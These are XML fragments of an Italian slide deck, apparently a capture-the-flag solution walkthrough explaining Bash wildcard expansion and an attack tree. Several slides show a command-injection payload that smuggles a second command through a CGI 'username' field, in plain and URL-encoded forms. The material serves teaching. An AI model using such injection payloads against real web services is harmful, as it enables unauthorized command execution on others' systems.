                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49CDB700-7F9C-F519-584B-B40DA718BD73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1894" t="22588" r="-1" b="27567"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1679725" y="2066055"/>
            <a:ext cx="6042132" cy="154156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201539052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0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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450" name="Google Shape;1450;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408693" y="499658"/>
            <a:ext cx="64122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it-IT" sz="3200"/>
              <a:t>soluzione</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1468" name="Google Shape;1468;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1469" name="Google Shape;1469;p54"/>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4"/>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4"/>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1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{877D37DB-FB3A-72A7-5ABB-F02B538D2D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768267" y="1119494"/>
            <a:ext cx="7380455" cy="56048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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Fortunatamente Bash supporta il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Pattern Matching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>, sul manuale leggiamo che l’operatore «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>» :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="image5.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32BAC236-16A7-37E2-E2E1-376CE5004346}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1611523" y="1747398"/>
            <a:ext cx="6080443" cy="11981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Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EC78149-FD3E-4383-B0BB-BD9D5E289FD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768267" y="3358547"/>
            <a:ext cx="7412714" cy="113525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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Il carattere «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>» può essere utilizzato per sostituire qualsiasi stringa. In questo caso lo utilizziamo come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00CFBE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>espansione del nome del percorso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Linux sostituirà automaticamente il simbolo * con la directory corretta che contiene il nostro script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SOLUZIONE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426194926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fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fade">
                                      <p:cBhvr>
                                        <p:cTn id="22"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450" name="Google Shape;1450;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408693" y="499658"/>
            <a:ext cx="64122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it-IT" sz="3200"/>
              <a:t>soluzione</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1468" name="Google Shape;1468;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1469" name="Google Shape;1469;p54"/>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4"/>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4"/>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441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2A99E8D-0699-03B8-19AF-ACFEF3B589B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="1122574"/>
            <a:ext cx="7578315" cy="56048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152400" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Quindi riscriviamo il comando</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> username= «user;/*/SOLUZIONE password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB087841-CB2C-AACF-6FAC-B3C2EEECBC2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714798" y="1927167"/>
            <a:ext cx="7578315" cy="64458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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Lo riscriviamo secondo la URL ENCODING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>( aggiungiamo la codifica di *)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user%3B%2F%2A%2FSOLUZIONE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2122491A-7CDB-3A31-3C26-6D6A02F0DABA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714798" y="2815855"/>
            <a:ext cx="3930944" cy="3503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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>E otteniamo il seguente risultato:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E839C8CD-9D07-6D2F-FFEE-E78E04B5B74F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1495648" y="3166242"/>
            <a:ext cx="6454699" cy="1234547"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271099984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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">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fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="Connettore diritto 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BDCB87D-38E4-1804-C8E9-8A50A7BEFD1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="2"/>
            <a:endCxn id="46" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6910100" y="3162592"/>
            <a:ext cx="232138" cy="23927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4A4F7672-20AF-3433-A5D5-9FCF61743F03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4879695" y="2209916"/>
            <a:ext cx="2262543" cy="446984"/>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Connettore diritto 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F8CB38A-B52B-C4F6-D7D8-89C33228A1EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3771933" y="2209916"/>
            <a:ext cx="1107762" cy="43641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Google Shape;4822;p101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCCD2D65-4409-EDDA-0A26-970C6BDF943A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057685" y="218514"/>
            <a:ext cx="2784570" cy="1389028"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3822"/>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823;p101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{462D169E-49DA-A01A-1A6C-930CC4C606BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179321" y="162801"/>
            <a:ext cx="2784570" cy="1610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200"/>
              <a:t>AGGIORNAMENTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALBERO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t> DI  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ATTACCO</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Google Shape;4824;p101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB17CC0F-C289-B7CA-AACB-7C24EA96C261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7941615" y="322874"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Google Shape;4825;p101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C20EC95-C62B-921A-A1AA-1A4CF48FBC12}"/>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826;p101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A197DFF9-854A-3501-FDA7-DAB8171626A6}"/>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827;p101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4AEA212-F56A-A5B2-193A-6E0D5E868AE5}"/>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 name="Connettore diritto 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2556DA2F-5ADE-D507-196A-EC0C36FB8ECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="2"/>
            <a:endCxn id="3" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1211702" y="1089707"/>
            <a:ext cx="1635694" cy="45171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Rettangolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB219DE4-3688-C785-E0F8-733BAE26DBAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1974560" y="584015"/>
            <a:ext cx="1745672" cy="50569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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Bandierina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Triangolo isoscele 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280A3A8B-446C-D676-492D-E5419E2B5FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="117193" y="1541417"/>
            <a:ext cx="2189018" cy="1579419"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Attacchi impraticabili</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Connettore diritto 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7915B40-3F40-96E4-B033-9FA12075422E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="2" idx="2"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2847396" y="1089707"/>
            <a:ext cx="2032299" cy="61451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6" name="Rettangolo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
